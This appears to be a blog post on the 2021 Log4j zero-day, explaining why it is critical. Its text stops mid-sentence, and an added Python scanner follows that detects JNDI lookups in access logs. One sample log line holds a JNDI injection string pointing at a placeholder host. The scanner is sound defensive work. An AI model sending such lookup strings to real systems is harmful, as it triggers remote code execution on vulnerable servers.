One of Santa’s (evil) helpers delivered a nasty early Christmas present on 9 December: a zero-day. The “Log4J” vulnerability was discovered by an Alibaba threat researcher and lies in a widely used open-source library. Read on for the gory details!
Versions 2 to 2.14.1 of the Apache Log4j library are vulnerable to a format string attack that allows an attacker to run arbitrary code on the system hosting the application. The vulnerability earns its critical CVSS v3 score of 10 for two reasons: opportunity and impact. Log4j is one of the most popular Java logging libraries, used in a plethora of enterprise applications, web services and open-source frameworks, so the number of potential targets a threat actor can exploit is high.
Unfortunately, the vulnerability is also trivial to exploit. An unauthenticated attacker need only submit a string containing a malicious Java Naming and Directory Interface (JNDI) reference to a vulnerable application, at a point where they know Log4j will log and evaluate it. At its heart, the vulnerability abuses a feature of JNDI that allows Log4j to run remotely hosted Java class
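Because the attacker-controlled string has to reach a logged field, web-server or application logs are the first place a defender can look for it. The detector below is an added example, not code from the original post: it scans constructed sample access-log lines (the host `lookup.invalid` and the addresses are placeholders) for Log4j lookup syntax, flagging a direct JNDI lookup and, as a weaker signal, any lookup nested inside another, while letting an ordinary `${date:...}` lookup through.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample access-log lines (not real traffic). Line 2 carries a JNDI
# lookup in the User-Agent header, the kind of input the post describes;
# line 3 carries a harmless lookup and must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:10:01:05 +0000] "GET /login HTTP/1.1" 200 77 "-" "${jndi:ldap://lookup.invalid/x}"
203.0.113.9 - - [10/Dec/2021:10:01:06 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 77 "-" "curl/7.68"
"""

# Direct JNDI lookup: "${", optional whitespace, "jndi", then ":" (case-insensitive).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# A lookup opened inside another lookup is rare in legitimate request data and
# worth reviewing even when the literal word "jndi" is absent.
NESTED_LOOKUP = re.compile(r"\$\{[^}]*\$\{")


def classify(line: str) -> Optional[str]:
    """Return a finding label for one log line, or None if it looks benign."""
    if JNDI_LOOKUP.search(line):
        return "jndi-lookup"
    if NESTED_LOOKUP.search(line):
        return "nested-lookup"
    return None


def scan(log_text: str) -> List[Tuple[int, str]]:
    """Scan a log blob line by line; return (line number, label) for each hit."""
    hits: List[Tuple[int, str]] = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        label = classify(line)
        if label is not None:
            hits.append((number, label))
    return hits


if __name__ == "__main__":
    for number, label in scan(SAMPLE_LOG):
        print(f"line {number}: {label}")
```

Point `scan` at a real log file's contents to triage it; a "jndi-lookup" hit on a host running an affected Log4j version is worth treating as an exploitation attempt until proven otherwise.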